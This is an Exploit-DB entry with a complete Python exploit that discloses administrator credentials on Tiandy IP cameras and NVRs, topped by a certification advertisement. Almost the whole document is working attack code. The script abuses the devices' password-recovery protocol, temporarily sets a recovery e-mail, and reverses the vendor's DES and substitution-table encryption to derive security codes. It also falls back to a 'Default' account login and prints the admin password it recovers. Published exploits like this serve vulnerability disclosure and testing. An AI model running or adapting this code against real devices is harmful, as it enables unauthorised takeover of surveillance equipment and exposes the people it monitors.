Tiandy IPC and NVR 9.12.7 - Credential Disclosure

EDB-ID:

48799

CVE:

N/A


Author:

zb3

Type:

webapps


Platform:

Hardware

Date:

2020-09-10


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

# Exploit Title: Tiandy IPC and NVR 9.12.7 - Credential Disclosure
# Date: 2020-09-10
# Exploit Author: zb3
# Vendor Homepage: http://en.tiandy.com
# Product Link: http://en.tiandy.com/index.php?s=/home/product/index/category/products.html
# Software Link: http://en.tiandy.com/index.php?s=/home/article/lists/category/188.html
# Version: DVRS_V9.12.7, DVRS_V11.7.4, NVSS_V13.6.1, NVSS_V22.1.0
# Tested on: Linux
# CVE: N/A


# Requires Python 3 and PyCrypto (or PyCryptodome, which provides the same `Crypto` package)

# For more details and information on how to escalate this further, see:
# https://github.com/zb3/tiandy-research


import sys
import hashlib
import base64
import socket
import struct

from Crypto.Cipher import DES


def main():
  """Command-line entry point.

  Expects exactly one argument, the target host.  Opens a Channel to it,
  fetches the session crypt key and then tries, in order:

  1. the security-code flow (get_psw_code + recover_with_code), at most
     twice, registering a placeholder address via try_set_mail when the
     device reports no recovery data;
  2. a login with the 'Default' account (recover_with_default) when no
     security code could be obtained.

  Recovered credentials are printed to stdout, diagnostics to stderr.
  Exits with status 1 on a usage error or when nothing was recovered.
  """
  if len(sys.argv) != 2:
    print('python3 %s [host]' % sys.argv[0], file=sys.stderr)
    # sys.exit rather than the bare exit(): the latter is injected by the
    # site module and is not guaranteed to exist (e.g. `python -S`).
    sys.exit(1)

  host = sys.argv[1]

  conn = Channel(host)
  conn.connect()

  crypt_key = conn.get_crypt_key(65536)

  attempts = 2
  tried_to_set_mail = False
  ok = False

  while attempts > 0:
    attempts -= 1

    # get_psw_code returns False (flow unsupported), None (no data) or a str.
    code = get_psw_code(conn)

    if code is False:
      # psw not supported
      break

    elif code is None:
      if not tried_to_set_mail:
        print("No PSW data found, we'll try to set it...", file=sys.stderr)

        tried_to_set_mail = True
        if try_set_mail(conn, 'a@a.a'):
          code = get_psw_code(conn)

    if code is None:
      print("couldn't set mail", file=sys.stderr)
      break

    rcode, password = recover_with_code(conn, code, crypt_key)

    if rcode == 5:
      print('The device is locked, try again later.', file=sys.stderr)
      break

    if rcode == 0:
      print('Admin', password)
      ok = True
      break

    # Any other status: fall through and retry while attempts remain.

  # Undo the placeholder address if one was written above.
  if tried_to_set_mail:
    try_set_mail(conn, '')

  # Reached for both False (unsupported) and None (no data could be set).
  if not code:
    print("PSW is not supported, trying default credentials...", file=sys.stderr)

    credentials = recover_with_default(conn, crypt_key)

    if credentials:
      user, pw = credentials
      print(user, pw)

      ok = True

  if not ok:
    print('Recovery failed', file=sys.stderr)
    sys.exit(1)


def try_set_mail(conn, target):
  """Send a RESERVEPHONE request carrying `target` and check the reply.

  conn   -- object providing send_msg(list) and recv_msg() -> list
  target -- string placed in the request (main() passes an e-mail-like
            value, or '' to clear it)

  Returns True when fields 4..6 of the reply are
  ['RESERVEPHONE', '2', '1'], otherwise False.
  """
  request = ['PROXY', 'USER', 'RESERVEPHONE', '2', '1', target, 'FILETRANSPORT']
  conn.send_msg(request)

  reply = conn.recv_msg()
  expected_ack = ['RESERVEPHONE', '2', '1']

  return reply[4:7] == expected_ack

def get_psw_code(conn):
  """Request password-recovery data and derive the security code from it.

  Sends a LOGON message for user 'Admin' with mode '65536' and inspects
  the reply.

  Returns:
    False -- field 4 of the reply is not 'FINDPSW'
    None  -- the reply carries no recovery data (fewer than 8 fields or an
             empty field 7)
    str   -- the last 8 hex digits of the MD5 of the td_decrypt()-ed data

  Raises Exception when the type in field 5 is not 1, 2 or 3.
  """
  admin_b64 = base64.b64encode(b'Admin').decode()
  conn.send_msg(['IP', 'USER', 'LOGON', admin_b64, admin_b64, '', '65536', 'UTF-8', '0', '1'])
  resp = conn.recv_msg()

  if resp[4] != 'FINDPSW':
    return False

  has_payload = len(resp) > 7
  psw_reg = resp[6] if has_payload else None
  psw_data = resp[7] if has_payload else None

  if not psw_data:
    return None

  psw_type = int(resp[5])

  if psw_type == 1:
    # Type 1: data is the part after the first ':'; key is up to 31 chars of field 6.
    blob = psw_data.split(':')[1]
    key = psw_reg[:0x1f]
  elif psw_type in (2, 3):
    # Type 3 wraps the data in a quoted structure: take the 4th '"'-separated piece.
    blob = psw_data.split('"')[3] if psw_type == 3 else psw_data
    key = psw_reg[:4].lower()
  else:
    raise Exception('unsupported psw type: '+str(psw_type))

  plain = td_decrypt(blob.encode(), key.encode())

  # hexdigest() is 32 characters long, so [24:] keeps the final 8.
  return hashlib.md5(plain).hexdigest()[24:]


def recover_with_code(conn, code, crypt_key):
  """Submit a security code and return (status, password).

  conn      -- object providing send_msg(list) and recv_msg() -> list
  code      -- security code string, as produced by get_psw_code()
  crypt_key -- key bytes used to decode the password field

  The status is field 6 of the reply converted to int.  The password is
  the decoded field 8 when the status is 0, otherwise None.
  """
  conn.send_msg(['IP', 'USER', 'SECURITYCODE', code, 'FILETRANSPORT'])
  reply = conn.recv_msg()

  status = int(reply[6])
  password = None

  if status == 0:
    password = decode(reply[8].encode(), crypt_key).decode()

  return status, password


def recover_with_default(conn, crypt_key):
  """Log in as 'Default'/'Default' and read credentials from the message stream.

  Returns False when conn.login_with_key() reports failure.  Otherwise
  reads messages until one whose fields 1..4 are
  ['IP', 'INNER', 'SUPER', 'GETUSERINFO'] arrives and returns a
  (user, password) tuple decoded from its fields 6 and 7.  There is no
  other exit from the wait: it ends only with that message or with an
  exception raised by recv_msg().
  """
  if not conn.login_with_key(b'Default', b'Default', crypt_key):
    return False

  wanted = ['IP', 'INNER', 'SUPER', 'GETUSERINFO']

  msg = conn.recv_msg()
  while msg[1:5] != wanted:
    msg = conn.recv_msg()

  user = decode(msg[6].encode(), crypt_key).decode()
  secret = decode(msg[7].encode(), crypt_key).decode()

  return user, secret


###
### lib/des.py
###

def reverse_bits(data):
  """Return `data` with the bit order of every byte mirrored (0x01 <-> 0x80).

  Uses the multiply / mask / modulus trick: the multiplication makes five
  shifted copies of the byte, the mask picks each bit from the copy where
  it sits at its mirrored position (mod 10), and the modulus by 2**10 - 1
  folds those bits back into a single byte.
  """
  spread = 0x0202020202
  select = 0x010884422010
  fold = 0x3ff

  mirrored = bytearray()
  for octet in data:
    mirrored.append(((octet * spread) & select) % fold)

  return bytes(mirrored)

def pad(data):
  """Extend `data` to a multiple of 8 bytes.

  The padding is zero bytes followed by one byte holding the padding
  length.  Input whose length is already a multiple of 8 (including
  empty input) is returned unchanged, with no padding block added.
  """
  remainder = len(data) % 8
  if remainder == 0:
    return data

  missing = 8 - remainder
  # bytes(n) yields n zero bytes; the final byte records the pad length.
  return data + bytes(missing - 1) + bytes((missing,))

def unpad(data):
  """Strip the padding produced by pad(), if present.

  The last byte is read as the padding length.  Padding is removed only
  when that length is in 1..8 and all bytes before it within the padding
  are zero; otherwise `data` is returned unchanged, as pad() adds nothing
  to input that is already block-aligned.

  Empty input is returned as-is instead of raising IndexError.
  """
  if not data:
    return data

  padlen = data[-1]

  if 0 < padlen <= 8 and data[-padlen:-1] == b'\x00'*(padlen-1):
    data = data[:-padlen]

  return data

def encrypt(data, key):
  """DES-ECB encrypt `data` with bit-mirrored key, input and output.

  The key and the padded plaintext are passed through reverse_bits()
  before encryption, and the ciphertext is passed through it again.
  """
  des = DES.new(reverse_bits(key), DES.MODE_ECB)
  mirrored_plain = reverse_bits(pad(data))
  return reverse_bits(des.encrypt(mirrored_plain))

def decrypt(data, key):
  """DES-ECB decrypt `data` with bit-mirrored key, input and output.

  The key and ciphertext are passed through reverse_bits() before
  decryption; the result is mirrored again and stripped with unpad().
  """
  des = DES.new(reverse_bits(key), DES.MODE_ECB)
  mirrored_plain = des.decrypt(reverse_bits(data))
  return unpad(reverse_bits(mirrored_plain))

def encode(data, key):
  """Encrypt `data` with `key` and return the ciphertext as base64 bytes."""
  ciphertext = encrypt(data, key)
  return base64.b64encode(ciphertext)

def decode(data, key):
  """Base64-decode `data`, then decrypt it with `key`; returns bytes."""
  ciphertext = base64.b64decode(data)
  return decrypt(ciphertext, key)


###
### lib/binproto.py
###

def recvall(s, l):
  """Read up to `l` bytes from socket-like `s`, looping over short reads.

  Stops early when recv() returns an empty result (peer closed), so the
  returned bytes object may be shorter than `l`; callers must check.
  """
  chunks = []
  remaining = l

  while remaining > 0:
    piece = s.recv(remaining)
    if not piece:
      break

    chunks.append(piece)
    remaining -= len(piece)

  return b''.join(chunks)

class Channel:
  """TCP client for the device's framed control protocol (default port 3001).

  Every frame starts with a 20-byte header whose first four bytes are a
  magic value selecting the frame kind:

  * f1 f5 ea f5 -- command frame: the payload is text made of
    tab-separated fields, messages separated by three newlines;
  * f1 f5 ea f9 -- data frame: a stream type plus a binary payload.

  Text messages are exchanged as lists of strings whose first element is
  an IP address.
  """

  def __init__(self, ip, port=3001):
    """Store the target address; no socket is opened until connect()."""
    self.ip = ip
    # Packed IPv4 address, byte-reversed, as written into data-frame headers.
    self.ip_bytes = socket.inet_aton(ip)[::-1]
    self.port = port
    self.msg_seq = 0    # sequence number of the next command frame
    self.data_seq = 0   # sequence number of the next data frame
    self.msg_queue = [] # received messages not yet handed to the caller

  def fileno(self):
    """Return the socket's file descriptor (usable with select())."""
    return self.socket.fileno()

  def connect(self):
    """Open a new TCP connection to (ip, port)."""
    self.socket = socket.socket()
    self.socket.connect((self.ip, self.port))

  def reconnect(self):
    """Close the current connection and open a fresh one."""
    self.socket.close()
    # Messages queued from the closed connection would otherwise be
    # returned by recv_msg() as if they were replies on the new one.
    self.msg_queue = []
    self.connect()

  def send_cmd(self, data):
    """Send `data` (bytes) as one command frame and bump msg_seq.

    Header layout: magic, 16-bit sequence, 16-bit total size
    (payload + 20), 8 zero bytes, 32-bit payload size; little-endian.
    """
    self.socket.sendall(b'\xf1\xf5\xea\xf5' + struct.pack('<HH8xI', self.msg_seq, len(data) + 20, len(data)) + data)
    self.msg_seq += 1

  def send_data(self, stream_type, data):
    """Send `data` (bytes) as one data frame and bump data_seq.

    Header layout: magic, 32-bit sequence, reversed IP bytes, 16-bit
    zero, 16-bit total size (payload + 20), 32-bit stream type.
    """
    self.socket.sendall(struct.pack('<4sI4sHHI', b'\xf1\xf5\xea\xf9', self.data_seq, self.ip_bytes, 0, len(data) + 20, stream_type) + data)
    self.data_seq += 1


  def recv(self):
    """Read one frame from the socket.

    Returns (None, [stream_type, payload]) for a data frame, where the
    payload is the frame body minus its first 8 bytes, or
    (messages, None) for a command frame, where each message is a list
    of strings.

    Raises Exception on an unknown magic, on a data frame whose body
    does not begin with b'NVS\\x00', or on inconsistent size fields.
    """
    hdr = recvall(self.socket, 20)
    if hdr[:4] == b'\xf1\xf5\xea\xf9':
      lsize, stream_type = struct.unpack('<14xHI', hdr)
      data = recvall(self.socket, lsize - 20)

      if data[:4] != b'NVS\x00':
        # Diagnostic output (goes to stdout) before failing.
        print(data[:4], b'NVS\x00')
        raise Exception('invalid data header')

      return None, [stream_type, data[8:]]


    elif hdr[:4] == b'\xf1\xf5\xea\xf5':
      # NOTE(review): send_cmd() writes the payload size as a 32-bit field
      # at offset 16, while this reads a 16-bit value at offset 18 --
      # presumably replies use a different layout; confirm with a capture.
      lsize, dsize = struct.unpack('<6xH10xH', hdr)

      if lsize != dsize + 20:
        raise Exception('size mismatch')

      msgs = []

      for msg in recvall(self.socket, dsize).decode().strip().split('\n\n\n'):
        msg = msg.split('\t')
        # Messages whose first field has no '.' lack the leading address
        # field; prepend ours so field indices are uniform.
        if '.' not in msg[0]:
          msg = [self.ip] + msg

        msgs.append(msg)

      return msgs, None

    else:
      raise Exception('invalid packet magic: ' + hdr[:4].hex())

  def recv_msg(self):
    """Return the next text message, reading from the socket if needed.

    Queued messages are served first.  Data frames received while
    waiting are discarded; previously such a frame made this method fail
    with TypeError because recv() returns None in the message slot.
    """
    if self.msg_queue:
      return self.msg_queue.pop(0)

    msgs = None
    while msgs is None:
      msgs, _ = self.recv()

    # A frame may carry several messages; keep the rest for later calls.
    self.msg_queue.extend(msgs[1:])

    return msgs[0]

  def send_msg(self, msg):
    """Send a list of string fields as one text message.

    The fields are prefixed with our IP, joined with tabs and terminated
    with three newlines.
    """
    self.send_cmd((self.ip+'\t'+'\t'.join(msg)+'\n\n\n').encode())

  def get_crypt_key(self, mode=1, uname=b'Admin', pw=b'Admin'):
    """Send a LOGON request and return the key bytes from the reply.

    The reply must have fields 4..5 equal to ['LOGONFAILED', '3']; the
    key is the base64-decoded field 8.  Any other reply is printed and
    an Exception is raised.
    """
    self.send_msg(['IP', 'USER', 'LOGON', base64.b64encode(uname).decode(), base64.b64encode(pw).decode(), '', str(mode), 'UTF-8', '805306367', '1'])

    resp = self.recv_msg()

    if resp[4:6] != ['LOGONFAILED', '3']:
      print(resp)
      raise Exception('unrecognized login response')

    crypt_key = base64.b64decode(resp[8])
    return crypt_key

  def login_with_key(self, uname, pw, crypt_key):
    """Reconnect and log in with credentials hashed against `crypt_key`.

    Sends base64(MD5(lowercased uname + key)) and base64(MD5(pw + key)).
    Returns False when field 4 of the reply is 'LOGONFAILED'; otherwise
    puts the reply back at the front of the queue and returns True.
    """
    self.reconnect()

    hashed_uname = base64.b64encode(hashlib.md5(uname.lower()+crypt_key).digest())
    hashed_pw = base64.b64encode(hashlib.md5(pw+crypt_key).digest())

    self.send_msg(['IP', 'USER', 'LOGON', hashed_uname.decode(), hashed_pw.decode(), '', '1', 'UTF-8', '1', '1'])
    resp = self.recv_msg()

    if resp[4] == 'LOGONFAILED':
      return False

    # Keep the first reply available to whoever reads messages next.
    self.msg_queue = [resp] + self.msg_queue

    return True

  def login(self, uname, pw):
    """Fetch a crypt key, then log in; return the key or False on failure."""
    crypt_key = self.get_crypt_key(1, uname, pw)

    if not self.login_with_key(uname, pw, crypt_key):
      return False

    return crypt_key



###
### lib/crypt.py
###

# Output alphabet shared by td_asctonum/td_numtoasc:
# indices 0-25 are 'a'-'z', indices 26-35 are '0'-'9'.
pat = b'abcdefghijklmnopqrstuvwxyz0123456789'

def td_asctonum(code):
  """Return the index of byte value `code` in `pat`, ignoring letter case.

  Upper-case ASCII letters are folded to lower case first.  Returns None
  when the (folded) value is not in the alphabet.
  """
  folded = code + 0x20 if code in b'ABCDEFGHIJKLMNOPQRSTUVWXYZ' else code

  position = pat.find(folded)
  return None if position < 0 else position


def td_numtoasc(code):
  """Return the `pat` byte value at index `code`, or None when code >= 36."""
  return pat[code] if code < 36 else None

# Substitution table used by td_decrypt: 36 rows of mixed-case letters and
# digits.  A key character selects a row (via td_asctonum), and the position
# of a ciphertext byte within that row is mapped back through `pat`.
# Byte-exact data: do not reorder or edit.
gword = [
  b'SjiW8JO7mH65awR3B4kTZeU90N1szIMrF2PC',
  b'04A1EF7rCH3fYl9UngKRcObJD6ve8W5jdTta',
  b'brU5XqY02ZcA3ygE6lf74BIG9LF8PzOHmTaC',
  b'2I1vF5NMYd0L68aQrp7gTwc4RP9kniJyfuCH',
  b'136HjBIPWzXCY9VMQa7JRiT4kKv2FGS5s8Lt',
  b'Hwrhs0Y1Ic3Eq25a6t8Z7TQXVMgdePuxCNzJ',
  b'WAmkt3RCZM829P4g1hanBluw6eVGSf7E05oX',
  b'dMxreKZ35tRQg8E02UNTaoI76wGSvVh9Wmc1',
  b'i20mzKraY74A6qR9QM8H3ecUkBlpJC1nyFSZ',
  b'XCAUP6H37toQWSgsNanf0j21VKu9T4EqyGd5',
  b'dFZPb9B6z1TavMUmXQHk7x402oEhKJD58pyG',
  b'rg8V3snTAX6xjuoCYf519BzWRtcMl2OiZNeI',
  b'dZe620lr8JW4iFhNj3K1x59Una7PXsLGvSmB',
  b'5yaQlGSArNzek6MXZ1BPOE3xV470h9KvgYmb',
  b'f12CVxeQ56YWd7OTXDtlnPqugjJikELayvMs',
  b'9Qoa5XkM6iIrR7u8tNZgSpbdDUWvwH21Kyzh',
  b'AqGWke65Y2ufVgljEhMHJL01D8Zptvcw7CxX',
  b't960P2inR8qEVmAUsDZIpH5wzSXJ43ob1kGW',
  b'4l6SAi2KhveRHVN5JGcmx9jOC3afB7wF0ITq',
  b'tEOp6Xo87QzPbn24J3i9FjWKS1lIBVaMZeHU',
  b'zx27DH915lhs04aMJOgf6Z3pyERrGndiLwIe',
  b'8XxOBzZ02hUWDQfvL471q9RC6sAaJVFuTMdG',
  b'jON0i4C6Z3K97DkbqSypH8lRmx5o2eIwXas1',
  b'OIGT0ubwH1x6hCvEgBn274A5Q8K9e3YyzWlm',
  b'zgejY41CLwRNabovBUP2Aql7FVM8uEDXZQ0c',
  b'Z2MpQE91gdRLYJ8bGIWyOfc4v03Hjzs6VlU5',
  b't6PuvrBXeoHk5FJW08DYQSI49GCwZ27cA1UK',
  b'FiBA53IMW97kYNz82GhHf1yUCdL0nlvRD46s',
  b'2Vz3b06h54jmc7a8AIYtNHM1iQU9wBXWyJkR',
  b'wyI42azocV3UOX6fk579hMH8eEGJsgFuBmqb',
  b'TxmnK4ljJ9iroY8vVtg3Rae2L516fBWUuXAS',
  b'z6Y1bPrJEln0uWeLKkjo9IZ2y7ROcFHqBm54',
  b'x064LFB39TsXeryqvt2pZN8QIERuWAVUmwjJ',
  b'76qg85yB31uH90YbZofsjKrRGiTVndAEtFMx',
  b'WjwTEbCA752kq89shcaLB1xO64rgMYnoFiJQ',
  b'u6307O4J2DeZs8UYyjlzfX91KGmavEdwTRSg'
]

def td_decrypt(data, key):
  """Decode `data` (bytes) with the keyed substitution table `gword`.

  Key bytes that are not ASCII letters or digits are ignored; the
  remaining ones are used cyclically, one per data byte.  Each key
  character selects a row of `gword`, and the position of the data byte
  in that row is translated through `pat`.

  Returns the decoded bytes, or None when a data byte does not occur in
  its row or when there is data but the key holds no usable character.
  The latter case used to loop forever (or raise IndexError for an empty
  key).
  """
  # Resolve the usable key characters once instead of rescanning the key
  # for every data byte.
  key_rows = [num for num in map(td_asctonum, key) if num is not None]

  if data and not key_rows:
    return None

  ret = []

  for idx, code in enumerate(data):
    row = gword[key_rows[idx % len(key_rows)]]

    cpos = row.find(code)
    if cpos < 0:
      return None

    ret.append(td_numtoasc(cpos))

  return bytes(ret)



# Run the recovery flow only when executed as a script, not when imported.
if __name__ == '__main__':
    main()